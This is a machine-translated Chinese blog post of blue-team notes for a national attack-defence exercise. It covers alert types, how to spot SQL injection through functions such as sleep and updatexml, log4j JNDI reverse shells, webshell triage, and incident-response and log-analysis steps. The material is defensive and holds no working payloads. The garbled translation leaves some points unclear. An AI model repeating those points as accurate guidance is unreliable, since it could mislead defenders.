当前位置:网站首页>HW notes (II)
HW notes (II)
2022-07-07 03:48:00 【H0ne】
HW Types of alarms found during
web attack : Information disclosure , Weak password ,xss,sql, Upload files , File contains ,webshell, Command execution ,xxe
Threat Intelligence : Trojan remote control , Mining Trojan , Blackmail virus , Botnet , Black market tools
sql Inject ,webshell How to determine the real attack
You can use payload Judge , Normal business requests sql The whole statement is long and no sensitive function is used ,sql Injected into the event request body payload It is usually short and there are sensitive functions in the statement such as sleep updatexml
Flow side / Main engine side How to determine false positives
The attack mainly comes from three directions , Network side , Host side and application side . The network side is traffic , Mainly check the alarm analysis of safety equipment , The host side sees what commands are executed , Or whether it is passed on , Application side view waf The firewall is good
Ideas for emergency response
First, check whether there is a false alarm , Isolate the host instead of false positives
To collect information : Collect customer information and poisoning host information , Include samples
Judgment type : Judge whether it is a security incident , What kind of security incident , blackmail , dig , Broken net ,ddos etc.
In depth analysis : Log analysis , Process analysis , Start item analysis , Sample analysis
The log was deleted : Is there a full flow device , parallel connection , see wireshake, logon server , See if there may be process log occupation , According to the process details , Find the soft connection , Then continue to view the recovery log
Clean up and disposal : Kill the process directly , Delete file , patch up , XOR is to repair files
Output report
Network seven layer protocol or model
osi Model : The physical layer , Data link layer , The network layer , Transport layer , The session layer , The presentation layer , application layer
tcp/ip(4 layer ): Network connection layer , The network layer , Transport layer , application layer
Research on Trojan horse virus , The virus broke out , How to deal with it , For example, worms
1、 Ask about the scope of the attack
2、 Attack trace mining
3、 Sample analysis
4、 Check and eradicate backdoors and Trojan files
cpu Occupancy rate and log troubleshooting
log4j Loophole
log4j With the help of JNDI Plug in vulnerability , use JNDI As a springboard to perform rebound shell
After finding the ice scorpion , Upload webshell The way of action
It mainly depends on the version of ice scorpion ,2.0 and 3.0 The encryption method of is different , Generally, ice scorpions are common 3.0, After finding the ice scorpion , see session And check whether there is md5 Encrypt data
linux Emergency and windows Emergency thinking , Mainly about the troubleshooting ideas and orders
linux Investigation thought , Mainly the source code , Log analysis , Information system analysis , Use d Whether shield scanning has webshell There is , then diff Source information , Check the modified places , Logs are divided into network logs and system logs , Network logs are mainly used find command , The system log uses last command , There is also system information analysis , Generally, when customer service uploads scripts, they run with scripts , Some customer service do not upload scripts , Then use history command , Check out the sensitive Directory , View port information
windows Mainly concentrated in accounts , journal , Port query , and linux Be the same in essentials while differing in minor points
The deployment mode of the heavenly eye
Bypass deployment , Switch traction flow
Successful log analysis cases
Common logs , Whether it is network log or system log , It's all about numbers , If a large number of 404, Or there are a lot of 4625, They all represent some meanings , Find out what the intruder is doing , How did you get in , Determine by matching some eigenvalues , stay linux of use grep and egrep To filter , stay windows of use log parse.
How to trace the attacker , The portrait of the attacker
Get access to , Stealing data , Take advantage of ,ddos etc.
agent ip, Springboard machine ,C2 The server etc.
Harpoon mail fishing ,web penetration , Puddle attack , Source penetration , Social engineering, etc
ip location id Tracking website url
HTTP Of TCP The difference between
tcp On the fourth floor ,http On the seventh floor
http It's a simple request - Response protocol tcp It's a connection oriented , reliable , Transport layer communication protocol based on byte stream ,http Running on the tcp above
eye
&& Double write , character AND Use capital letters
Field is sip dip Express original ip, Purpose ip, Followed by a colon and a specific field
eye : Based on network traffic and terminals EDR journal , Use Threat Intelligence , Rules engine , File virtual execution , Techniques like machine learning , Accurately discover the intrusion behaviors of known advanced network attacks and unknown new network attacks against hosts and servers in the network
NGSOC( Security situational awareness and security operations ): Based on big data platform , By collecting multiple , Heterogeneous massive logs , Using correlation analysis , machine learning , Threat Intelligence and other technologies , Help government and enterprise customer service to continuously monitor the network security situation , from “ Passive defense ” towards “ Active defense ” Advanced
Tianyan only analyzes the flow ,ngsoc Analysis is achieved testing Management Closed loop capability
边栏推荐
猜你喜欢
Clock in during winter vacation
[dpdk] dpdk sample source code analysis III: dpdk-l3fwd_ 001
预处理——插值
Principle of attention mechanism
QT 项目 表格新建列名称设置 需求练习(找数组消失的数字、最大值)
Ubuntu20 installation redisjson record
【安全攻防】序列化與反序列,你了解多少?
Function reentry, function overloading and function rewriting are understood by yourself
Docker部署Mysql8的实现步骤
Baidu map JS development, open a blank, bmapgl is not defined, err_ FILE_ NOT_ FOUND
随机推荐
About Estimation Statistics
【mysql】mysql中行排序
Codeworks 5 questions per day (1700 average) - day 7
[leetcode] 700 and 701 (search and insert of binary search tree)
小程序能运行在自有App中,且实现直播和连麦?
代码质量管理
About Confidence Intervals
Sub pixel corner detection opencv cornersubpix
大白话高并发(二)
QT thread and other 01 concepts
About Tolerance Intervals
Open3d mesh filtering
22. (ArcGIS API for JS) ArcGIS API for JS Circle Collection (sketchviewmodel)
R data analysis: how to predict Cox model and reproduce high score articles
卡尔曼滤波-1
亚像素级角点检测Opencv-cornerSubPix
未来发展路线确认!数字经济、数字化转型、数据...这次会议很重要
QT 打开文件 使用 QFileDialog 获取文件名称、内容等
VHDL实现任意大小矩阵乘法运算
Under the tide of "going from virtual to real", Baidu AI Cloud is born from real